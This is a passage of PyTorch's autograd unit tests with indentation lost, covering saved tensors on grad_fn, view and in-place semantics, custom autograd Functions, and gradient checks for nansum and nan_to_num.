self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str?
out = torch.div(a, 2., rounding_mode=None)
self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str?
x = torch.zeros(5, requires_grad=True)
out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex
cfloat = torch.tensor(1 + 0j, dtype=torch.complex64)
out = torch.threshold(x, threshold=cfloat, value=(1 + 0j))
self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex
out = torch.threshold(x, threshold=1., value=1.)
self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float
out = torch.threshold(x, threshold=1, value=1)
self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int
out = torch.threshold(x, threshold=False, value=False)
self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool
a = torch.ones(2, 2, requires_grad=True)
out = a.as_strided((3,), (1,), 1)
self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10:optional<int64_t> -> int?
self.assertIsInstance(out.grad_fn._saved_storage_offset, int)
out = a.as_strided((3,), (1,))
self.assertIsNone(out.grad_fn._saved_storage_offset)
a = torch.ones(2, requires_grad=True)
out = torch.tanh(a)
self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output
a = torch.randn(3, 5, requires_grad=True)
b = torch.tensor([1, 0, 4])
loss = nn.NLLLoss()
out = loss(a, b)
self.assertIsNone(out.grad_fn._saved_weight)
loss = nn.NLLLoss(weight=torch.ones((5,)))
out = loss(a, b)
self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10:optional<Tensor> -> Tensor?
out.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
out.grad_fn._saved_weight
def test_autograd_views_codegen(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks the behavior of two codegen functions (view_as and unbind)
# with respect to view tracking and inplace operation on the output.
def run_test(grad_mode, requires_grad, is_view, should_raise_tuple):
def maybe_check_raise(fn, should_raise):
self.assertTrue(should_raise is None or isinstance(should_raise, str))
if should_raise is not None:
with self.assertRaisesRegex(RuntimeError, should_raise):
fn()
else:
fn()
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.view_as(inp)
# Are they differentiable views?
self.assertTrue(out._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0])
inp = torch.rand(2, requires_grad=requires_grad).clone()
with torch.set_grad_enabled(grad_mode):
out = inp.unbind()
# Are they differentiable views?
self.assertTrue(out[0]._is_view() == is_view)
self.assertTrue(out[1]._is_view() == is_view)
# Are inplace allowed?
maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1])
maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2])
# should_raise contains None if it should not raise
# should_raise contains a string of the error if it should raise
# The 3 elements are for view_as, first output of unbind and second output of unbind
run_test(grad_mode=True, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
inp_change_err = "Output {} of UnbindBackward is a view and is being modified inplace."
run_test(grad_mode=True, requires_grad=True, is_view=True,
should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1")))
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
run_test(grad_mode=False, requires_grad=True, is_view=True,
should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err))
run_test(grad_mode=False, requires_grad=False, is_view=True,
should_raise_tuple=(None, None, None))
def test_inplace_not_requires_grad(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp):
return inp.view_as(inp)
@staticmethod
def backward(ctx, grad):
return grad
# Original Tensor does not require grad
a = torch.rand(1, 2)
# Tensor being written does require grad
b = torch.rand(1, requires_grad=True)
# Take an invalid view on 'a' that should raise an error (warns during deprecation)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a += b
# Extra test for copy_ that is a manual implementation and could be easily
# forgotten when the codegen is updated (warns during deprecation)
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = MyFn.apply(a)
with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"):
view_a.copy_(b)
# Functions that should throw must properly throw
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
view_a = a.unbind()[0]
with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns "
"multiple views."):
view_a.copy_(b)
# Sanity check that views that should work still work
a = torch.rand(1, 2)
b = torch.rand(1, requires_grad=True)
a.select(1, 0).copy_(b)
def _do_test_autograd_simple_views_python(self, dtype):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks the autograd.Function behavior when we return one or multiple outputs
# while one of these is an input, a view of an input or of a temporary tensor.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
# This indicator is used to check if the argument `ga` contains non-zero values
ga_nz = [False]
class IdOneOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a
@staticmethod
def backward(ctx, ga):
bw_called[0] += 1
return ga, None, None
class IdTwoOutput(Function):
@staticmethod
def forward(ctx, a, b, make_view):
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
if ga.eq(0).all():
ga_nz[0] = False
else:
ga_nz[0] = True
return ga + gab, gab, None
class ViewOfTemp(Function):
@staticmethod
def forward(ctx, a, make_view):
ctx.save_for_backward(a)
if make_view:
a = a.narrow(0, 0, 2)
else:
a = a.clone()
b = a.clone()
return b.select(0, 0)
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, 0).copy_(grad)
return res, None
fn_id_to_inplace_on_view_err_msg = {
"one_output": ("Output 0 of IdOneOutputBackward is a view and is being "
"modified inplace. This view was created inside a custom Function"),
"two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace."
" This view is the output of a function that returns multiple views."),
"view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being "
"modified inplace. This view was created inside a custom Function")
}
for fn_id in ["one_output", "two_output", "view_of_temp"]:
for inplace in [True, False]:
for make_view in [True, False]:
# Used for special casing the tests below
output_is_a_view = (make_view or fn_id == "view_of_temp")
def fn(a, b):
# never modify a, b inplace for gracheck
a = a.clone()
b = b.clone()
if fn_id == "two_output":
tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view)
if inplace:
tmp1 += 3
tmp2 += 3
else:
tmp1 = tmp1 + 3
tmp2 = tmp2 + 3
tmp = tmp1 * tmp2
else:
if fn_id == "one_output":
tmp = IdOneOutput.apply(a, b, make_view)
else:
tmp = ViewOfTemp.apply(a + b, make_view)
if inplace:
tmp += 3
else:
tmp = tmp + 3
return tmp.sum()
a = torch.ones(2, dtype=dtype, requires_grad=True)
b = torch.ones(2, dtype=dtype, requires_grad=True)
err_msg = fn_id_to_inplace_on_view_err_msg[fn_id]
if not inplace or not output_is_a_view:
gradcheck(fn, (a, b), check_batched_grad=False)
# Was the custom backward called properly
bw_called[0] = 0
ga_nz[0] = True # For the case where the backward is called
if inplace and output_is_a_view:
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(a, b)
else:
fn(a, b).backward()
expected_called = 1
expected_ga_nz = True
if output_is_a_view and inplace:
expected_called = 0
self.assertTrue(bw_called[0] == expected_called)
self.assertTrue(ga_nz[0] == expected_ga_nz)
def test_autograd_simple_views_python(self):
self._do_test_autograd_simple_views_python(torch.double)
self._do_test_autograd_simple_views_python(torch.cdouble)
def test_autograd_inplace_views_creation_meta(self):
# Tests creation_meta properly handled for inplace views
class Func(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.view_as(x)
@staticmethod
def backward(ctx, x):
return x
view_custom = Func.apply
def run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2):
# This test checks the behavior of inplace-view functions when
# the views are created in grad mode or not
base = torch.rand(2, 3, requires_grad=requires_grad).clone()
# 1. Create a view with `grad_mode=grad_mode_view`
with torch.set_grad_enabled(grad_mode_view):
if fn_type == "multi_view":
inp = base.unbind()[0]
elif fn_type == "custom" :
inp = view_custom(base)
else:
inp = base.view_as(base)
# 2. Perform inplace view with `grad_mode=grad_mode_iview`
with torch.set_grad_enabled(grad_mode_iview):
if error1 is not None:
with self.assertRaisesRegex(RuntimeError, error1):
fn(inp)
return
else:
# If error is None, check that runs without error
fn(inp)
# 3. Do inplace on the (new) view
if error2 is not None:
with self.assertRaisesRegex(RuntimeError, error2):
inp.add_(1)
else:
# If error is None, check that runs without error
inp.add_(1)
no_grad_err = "A view was created in no_grad mode"
multi_view_err = "function that returns multiple views"
custom_err = "view was created inside a custom Function"
def run_tests(fn):
for fn_type in ("normal", "multi_view", "custom"):
for grad_mode_view in (True, False):
for grad_mode_iview in (True, False):
for requires_grad in (True, False):
error1 = None # expected error when we do inplace_view on original view
error2 = None # expected error when we do inplace on the resulting view
if requires_grad:
if not grad_mode_view and grad_mode_iview:
error1 = no_grad_err
if not grad_mode_view and not grad_mode_iview:
error2 = no_grad_err
if fn_type == "multi_view":
if grad_mode_view and grad_mode_iview:
error1 = multi_view_err
if grad_mode_view and not grad_mode_iview:
error2 = multi_view_err
if fn_type == "custom":
if grad_mode_view and grad_mode_iview:
error1 = custom_err
if grad_mode_view and not grad_mode_iview:
error2 = custom_err
run_test(fn, fn_type, grad_mode_view, grad_mode_iview, requires_grad, error1, error2)
# This list was created by logging gen_inplace_or_view_type.py
# detach_ is excluded for this test because it cannot be applied to
# views and thus does not return a view
run_tests(lambda v: v.as_strided_((1, 0), (2, 2)))
run_tests(lambda v: v.transpose_(0, 0))
run_tests(lambda v: v.t_())
run_tests(lambda v: v.squeeze_(0))
run_tests(lambda v: v.unsqueeze_(0))
run_tests(lambda v: v.swapdims_(0, 0))
run_tests(lambda v: v.swapaxes_(0, 0))
# TODO This is not the correct behavior -
# See https://github.com/pytorch/pytorch/issues/49825#issuecomment-794466627
def test_autograd_inplace_views_cross_dtype(self):
# This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b = b.transpose(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
non_inplace_grad = a_orig.grad
a_orig = torch.rand(3, 3, requires_grad=True, dtype=torch.complex64)
a = a_orig.clone()
b = torch.view_as_real(a)
b.transpose_(0, 1)
b += 1
b.backward(torch.arange(0, 18, dtype=torch.float).view(3, 3, 2))
inplace_grad = a_orig.grad
# TODO: this is a bug!
# once this is fixed, it should have the transpose removed:
# self.assertTrue(torch.allclose(non_inplace_grad, inplace_grad))
self.assertEqual(non_inplace_grad.T, inplace_grad)
def test_autograd_multiple_views_python(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This checks that multiples views in the forward are properly traced and how they
# behave with respect to inplace operations.
# This indicator is used to track how many times the backward function was called
bw_called = [0]
class ComplexView(Function):
@staticmethod
def forward(ctx, a, idx):
res = a.narrow(0, idx, 1)
res = a.select(0, idx)
ctx.save_for_backward(a)
ctx.idx = idx
return res
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
a, = ctx.saved_tensors
res = torch.zeros_like(a)
res.select(0, ctx.idx).copy_(grad)
return res, None
a = torch.ones(2, requires_grad=True)
idx = 1
bw_called[0] = 0
out = ComplexView.apply(a.clone(), idx)
out.sum().backward()
self.assertTrue(bw_called[0] == 1)
out = ComplexView.apply(a.clone(), idx)
with self.assertRaisesRegex(RuntimeError,
"Output 0 of ComplexViewBackward is a view and is being modified inplace"):
out += 1
def test_autograd_python_custom_function_inplace(self):
# This is not necessarily the absolute correct behavior, but this is the current
# one. This test is here to make sure that any change to this behavior is detected
# and not silent. The TODOs below mark the places with unexpected behavior.
# Note that any change in these test will be BC-breaking and should be done carefully.
# This test checks custom autograd.Function that perform inplace operations
bw_called = [0]
# I) Single output
class MyAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
# No extra inplace
c = MyAdder.apply(a.clone(), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c = MyAdder.apply(a.clone(), b)
c += 2
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
bw_called[0] = 0
c = MyAdder.apply(a.clone().view_as(a), b)
c.sum().backward()
self.assertTrue(bw_called[0] == 1)
# Should not give non-inputs to mark_dirty
class MyAdderBad(Function):
@staticmethod
def forward(ctx, a, b):
c = 3 * a
c.add_(b)
ctx.mark_dirty(c)
return c
@staticmethod
def backward(ctx, grad):
bw_called[0] += 1
grad = 3 * grad
return grad, grad
a = torch.ones(2, requires_grad=True)
b = torch.ones(2, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
MyAdderBad.apply(a.clone(), b)
self.assertEqual(len(w), 1)
# II) Multiple outputs
class MyBadAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a, a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + gab
# No extra inplace
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# With extra inplace on the output
bw_called[0] = 0
c, d = MyBadAdder.apply(a.clone(), b)
c += 2
(c * d).sum().backward()
self.assertTrue(bw_called[0] == 1)
# The input is a view
inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor"
with self.assertRaisesRegex(RuntimeError, inplace_on_view_err):
c, d = MyBadAdder.apply(a.clone().view_as(a), b)
# III) Inplace + other op
class MyOutPlaceAdder(Function):
@staticmethod
def forward(ctx, a, b):
a.add_(b)
ctx.mark_dirty(a)
return a.clone(), a + b
@staticmethod
def backward(ctx, ga, gab):
bw_called[0] += 1
return ga + gab, ga + 2 * gab
# We don't reuse the input
def fn(a, b):
orig_a = a.clone().view_as(a)
c, d = MyOutPlaceAdder.apply(orig_a, b)
return (c * d).sum()
bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output."
with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err):
fn(a, b)
def test_named_tensor_for_complex_views(self):
names = ["batch", "height", "width", "complex"]
z = torch.ones((5, 12, 14, 2), requires_grad=True)
z_named = z.refine_names(*names)
z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1])
z_complex.sum().backward()
self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None)))
def test_custom_function_return_view_in_nograd(self):
class Alias(Function):
@staticmethod
def forward(ctx, x):
return x[:]
@staticmethod
def backward(ctx, gx):
return gx
inp = torch.rand(2, requires_grad=True)
with torch.no_grad():
output = Alias.apply(inp)
with torch.no_grad():
expected_output = inp[:]
# Calling the custom function should operate as if we called an equivalent op
self.assertEqual(output.requires_grad, expected_output.requires_grad)
# Check that in-place modification on view throws
leaf_grad_err = "A view was created in no_grad mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, leaf_grad_err):
output.zero_()
def test_grad_mode_restored_reentrant(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, go):
original = torch._C.is_grad_enabled()
with torch.enable_grad():
self.assertTrue(torch._C.is_grad_enabled())
foo = torch.rand(go.size(), requires_grad=True)
grad, = torch.autograd.grad(
foo ** 3, foo, grad_outputs=go
)
self.assertTrue(torch._C.is_grad_enabled())
self.assertTrue(torch._C.is_grad_enabled() == original)
return grad
inp = torch.rand(3, requires_grad=True)
# Case where original==False
MyFunction.apply(inp).sum().backward()
# Case where original==True
MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_nansum_with_nans(self):
a = torch.randn(2, 2, 2, 2, dtype=torch.double)
with torch.no_grad():
a[a < 0.2] = float('nan')
a.requires_grad = True
# No args
gradcheck(lambda x: x.nansum(), a)
gradgradcheck(lambda x: x.nansum(), a)
# Single dim
gradcheck(lambda x: x.nansum((0)), a)
gradgradcheck(lambda x: x.nansum((0)), a)
# Multi dim
gradcheck(lambda x: x.nansum((0, 2)), a)
gradgradcheck(lambda x: x.nansum((0, 2)), a)
gradcheck(lambda x: x.nansum((0, -1)), a)
gradgradcheck(lambda x: x.nansum((0, -1)), a)
# With keep-dim
gradcheck(lambda x: x.nansum((0, -1), True), a)
gradgradcheck(lambda x: x.nansum((0, -1), True), a)
def test_nansum_dtype(self):
inp = torch.randn(2, 2, 2, 2)
with torch.no_grad():
inp[inp < 0.2] = float('nan')
def test(inp, inp_dtype, out_dtype):
with torch.no_grad():
a = inp.to(inp_dtype)
a.requires_grad = True
b = torch.sum(a, dtype=out_dtype)
b.backward()
self.assertEqual(a.dtype, a.grad.dtype)
test(inp, torch.float, torch.double)
test(inp, torch.double, torch.float)
def test_nan_to_num(self):
a = torch.randn(3, 3, 3, 3, dtype=torch.double)
with torch.no_grad():
a[torch.rand_like(a) < 0.2] = float('nan')
a[torch.rand_like(a) < 0.2] = float('inf')
a[torch.rand_like(a) < 0.2] = -float('inf')
a.requires_grad = True
gradcheck(lambda x: x.nan_to_num(), a)
gradgradcheck(lambda x: x.nan_to_num(), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
def test_custom_function_error(self):
class BadFw(Function):
@staticmethod
def backward(ctx, foo):
return foo
class BadBw(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
inp = torch.rand(1, requires_grad=True)
with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
BadFw.apply(inp)
with self.assertRaisesRegex(RuntimeError, "must implement the backward"):
BadBw.apply(inp).sum().backward()
def test_custom_function_local_inplace(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
inp = torch.rand(4, requires_grad=True)
out = inp.argmax()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argmin()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argsort()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.rand((), requires_grad=True)
out = torch.searchsorted(inp, val)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
vals = torch.rand(5, 5, requires_grad=True)
out = torch.bucketize(vals, bins)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.empty(5).requires_grad_()
out = val.count_nonzero()
self.assertFalse(out.requires_grad)
def assert_only_first_requires_grad(res):
if not isinstance(res, tuple):
res = (res,)
self.assertTrue(res[0].requires_grad)
for out in res[1:]:
if out is not None:
self.assertFalse(out.requires_grad)
for sort in [True, False]:
for return_inverse in [True, False]:
for return_counts in [True, False]:
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
# Here we test the internal functions to make sure all of them are
# covered on top of the public API
res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
assert_only_first_requires_grad(res)
# This looks public but is actually manually deleted from the
# torch namespace in torch/functional.py
res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
# We don't test `unique_dim_consecutive` here.
# It looks public but the python binding is actually manually disabled in
# tools/autograd/gen_python_functions.py
res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
def test_custom_function_cycle(self):
class MyFn(Function):
@staticmethod
def forward(ctx, x, metadata):
x = x.clone()
ctx.meta = metadata
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
self.assertEqual(x, 3.14)
self.assertEqual(ctx.meta["foo"], 3.14)
return gO * x, None
def get_refs(with_backward):
a = torch.tensor(3.14, requires_grad=True)
metadata = {}
out = MyFn.apply(a, metadata)
metadata["foo"] = out
if with_backward:
out.sum().backward()
self.assertEqual(a.grad, a)
return torch._C._WeakTensorRef(out)
with disable_gc():
ref = get_refs(False)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
# The backward clears the saved_variables but not the __dict__
with disable_gc():
ref = get_refs(True)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
leaf = torch.rand(2, 2, requires_grad=True)
# An op that returns sparse gradients
ind = torch.tensor([[0, 0]], dtype=torch.long)
out2 = leaf.gather(0, ind, sparse_grad=True)
# An op that returns the gradients as-is
out1 = leaf.clone()
grad_out1_original = torch.rand_like(out1)
grad_out1 = grad_out1_original.clone()
grad_out2 = torch.rand_like(out2)
torch.autograd.backward((out1, out2), (grad_out1, grad_out2))
# Given gradients should not be modified inplace
self.assertEqual(grad_out1, grad_out1_original)
def test_no_unnecessary_unwrapping(self):
a = torch.randn(5, requires_grad=True)
a_orig = a.detach().clone()
b = a * a
c = a * b
d = torch.exp(a)
# a is leaf
self.assertIs(b.grad_fn._saved_self, a)
self.assertIs(b.grad_fn._saved_other, a)
self.assertIs(c.grad_fn._saved_self, a)
# b is not an output
self.assertIs(c.grad_fn._saved_other, b)
# d is an output
self.assertEqual(d.grad_fn._saved_result, d)
self.assertIsNot(d.grad_fn._saved_result, d)
c.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
c.grad_fn._saved_self
# a is left untouched
self.assertEqual(a, a_orig)
def test_saved_variable_version_counter(self):
a = torch.rand(2, requires_grad=True)
b = torch.exp(a)
b_unpacked = b.grad_fn._saved_result
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
with torch.no_grad():
b += 1
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
def index_perm_variable(shape, max_indices):
if not isinstance(shape, tuple):
shape = (shape,)
index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape)
return index
def bernoulli_scalar():
return torch.tensor(0, dtype=torch.uint8).bernoulli_()
def gradgradcheck_method_precision_override(test_name):
# these are just empirical observations, we should improve
gradgradcheck_precision_override = {
'test_norm': {'atol': 2e-2, 'rtol': 1e-2},
'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2},
'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2},
}
non_broadcasted_test_name = test_name.split("_broadcast")[0]
override = gradgradcheck_precision_override.get(non_broadcasted_test_name)
if override:
if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name:
# errors accumulated across 1 dimension
override = {'atol': override['atol'] * S, 'rtol': override['atol'] * S}
elif 'broadcast_all' in test_name:
# errors accumulated across multiple dimensions
override = {'atol': override['atol'] * S * S, 'rtol': override['atol'] * S * S}
return override
def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable,
input_variables, run_gradgradcheck=True, check_batched_grad=True,
check_forward_ad=False):
test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION,
check_batched_grad=check_batched_grad, check_forward_ad=check_forward_ad))
gradgradcheck_precision_override = gradgradcheck_method_precision_override(test_name)
if gradgradcheck_precision_override is not None:
atol = gradgradcheck_precision_override['atol']
rtol = gradgradcheck_precision_override['rtol']
test_case.assertTrue(gradgradcheck(apply_method, input_variables, None, atol=atol, rtol=rtol,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
else:
test_case.assertTrue(gradgradcheck(apply_method, input_variables,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks,
f_args_variable, f_args_tensor, *, check_forward_ad=False):
output_variable = apply_fn(*f_args_variable)
if run_grad_checks:
run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn,
output_variable, f_args_variable, check_forward_ad=check_forward_ad)
self_variable = f_args_variable[0]
if isinstance(output_variable, torch.Tensor) and output_variable.requires_grad and self_variable is not None:
output_variable.backward(randn_like(output_variable))
test_case.assertEqualTypeString(self_variable, self_variable.grad)
test_case.assertEqual(self_variable.size(), self_variable.grad.size())
class TestAutogradComplex(TestCase):
def test_view_func_for_complex_views(self):
# case 1: both parent and child have view_func
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
x0 = x.clone()
x1 = torch.view_as_complex(x0)
x2 = torch.view_as_real(x1)
x2.mul_(2)
x2.sum().backward()
y0 = y.clone()
y0.mul_(2)
y0.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 2: parent has view_func but child does not
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a):
b = a.clone()
b1 = torch.view_as_complex(b)
b2 = b1.reshape(b1.numel())
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 3: parent does not have a view_func but child does
x = torch.randn(10, dtype=torch.cdouble, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a, dim0_size=5):
b = a.clone()
b1 = b.reshape(dim0_size, 2)
b2 = torch.view_as_real(b1)
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
def test_view_with_multi_output(self):
x = torch.randn(2, 2, 2, dtype=torch.double)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
x.requires_grad_(True)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
def as_identity(self):
# view_as_real and view_as_complex behavior should be like an identity
def func(z):
z_ = torch.view_as_complex(z)
z_select = torch.select(z_, z_.dim() - 1, 0)
z_select_real = torch.view_as_real(z_select)
return z_select_real.sum()
z = torch.randn(10, 2, 2, dtype=torch.double, requires_grad=True)
gradcheck(func, [z])
func(z).backward()
z1 = z.clone().detach().requires_grad_(True)
torch.select(z1, z1.dim() - 2, 0).sum().backward()
self.assertEqual(z.grad, z1.grad)
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors or tuple of Tensors with the same size
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
